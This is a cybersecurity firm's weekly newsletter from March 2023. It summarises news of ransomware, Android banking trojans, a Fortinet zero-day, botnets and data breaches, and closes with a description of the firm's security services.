31 Mar Newsletter For Fourth Week of March 2023
Chinese Hackers Exploit Fortinet Zero-Day Flaw For Cyber Espionage Attack
An alleged Chinese hacking organisation has been connected to the zero-day exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system. The activity cluster is a part of a larger campaign to install backdoors onto Fortinet and VMware products and maintain persistent access to target environments, according to threat intelligence company Mandiant, which made the attribution.
FakeCalls Vishing Malware Targets South Korean Users Via Popular Financial Apps
FakeCalls, an Android voice phishing (also known as vishing) malware operation, has reemerged to attack South Korean users under the guise of more than 20 well-known banking apps.In April 2022, Kaspersky published a report on FakeCalls that described the malware’s capacity to mimic phone conversations with bank customer service agents.
GoatRAT Android Banking Trojan Targets Mobile Automated Payment System
Another Android banking Trojan capable of making instant unauthorised money transfers is targeting Brazilian banks as part of a growing trend among threat actors to exploit Latin America’s new automated payment system.The new GoatRAT — like BraxDex, Senomorphy, and PixPirate steals the Pix key of the mobile devices it targets to make instant payments from compromised accounts, researchers from Cyble revealed in a blog post.
US Government Warns Organizations Of LockBit 3.0 Ransomware Attacks
U.S. government agencies have released a joint cybersecurity advisory detailing the indicators of compromise (IoCs) and tactics, techniques, and procedures (TTPs) associated with the notorious LockBit 3.0 ransomware.The LockBit 3.0 ransomware activities, which are a continuation of the LockBit 2.0 and LockBit ransomware variants, “work as a Ransomware-as-a-Service (RaaS) model,” according to the authorities.
Latitude Financial Services Data Breach Impacts 300,000 Customers
Over 300,000 of Latitude Financial Services’ customers in Australia have been informed that a data breach may have exposed some of their personal information.A subsidiary of Deutsche Bank and KKE operating since 2015 and headquartered in Melbourne, Latitude is the largest non-bank provider of consumer credit in Australia, under the moniker Gem Finance.The business revealed on Thursday that it had been the victim of a cyberattack that had forced it to halt operations and stolen customer data.
New GoLang-Based HinataBot Exploiting Router And Server Flaws For DDoS Attacks
HinataBot, a new Golang-based botnet, has been observed exploiting known flaws to compromise routers and servers and use them to launch distributed denial-of-service (DDoS) attacks.The malware was distributed by exploiting exposed Hadoop YARN servers and security flaws in Realtek SDK devices (CVE-2014-8361) and Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8).
Chinese And Russian Hackers Using SILKLOADER Malware To Evade Detection
Threat activity clusters linked with the Chinese and Russian cybercriminal ecosystems have been discovered deploying a new piece of malware that’s meant to load Cobalt Strike onto compromised devices.The malware, known as SILKLOADER by Finnish cybersecurity firm WithSecure, uses DLL side-loading strategies to distribute the adversary simulation software.
Warning: AI-generated YouTube Video Tutorials Spreading Infostealer Malware
AI-generated YouTube videos is being widely used by threat actors to spread stealer malware like Raccoon, RedLine, and Vidar. “The videos entice users by purporting to be tutorials on how to download cracked versions of software such as Photoshop, Premiere Pro, Autodesk 3ds Max, AutoCAD, and other licenced products available only to paid users,” CloudSEK researcher Pavan Karthick M explained.
KamiKakaBot Malware Used In Latest Dark Pink APT Attacks On Southeast Asian Targets
The Dark Pink advanced persistent threat (APT) actor has been linked to a new wave of attacks using the KamiKakaBot malware against government and military entities in Southeast Asian countries.The threat actor is thought to be of Asian origin and has been active since at least mid-2021, with a spike in activity in 2022.
Bee-Ware Of Trigona, An Emerging Ransomware Strain
Security experts initially came across the Trigona ransomware strain in the latter part of October 2022.They found that Trigona was particularly active in December 2022, with at least 15 potential victims infected, by studying Trigona ransomware binaries and ransom letters provided from VirusTotal as well as information from Unit 42 incident response. Businesses in the manufacturing, finance, construction, agricultural, marketing, and high technology sectors are among those that are impacted.
The TechLab Cyber Security Team responsible for monitoring, identifying, detecting, protecting, isolating, responding and recovering based on current threats provides 24x7x365 services, TechLab Security specializes in various security products, projects, network devices, end-user devices, and system.
The TechLab Cyber Security Team Major Responsibilities Are:
• Monitor, Analyze, Correlate & Escalate Intrusion Events,
• Develop Appropriate Responses; Protect, Detect, Respond,
• Conduct Incident Management and Forensic Investigation,
• Maintain Security Community Relationships,
• Various Cyber Security Consulting Services such as Penetration Testing, Vulnerability Assessment, PCI-DSS Compliance and ISO27001 implementation and Audit compliances,
• Assist in Crisis Operations.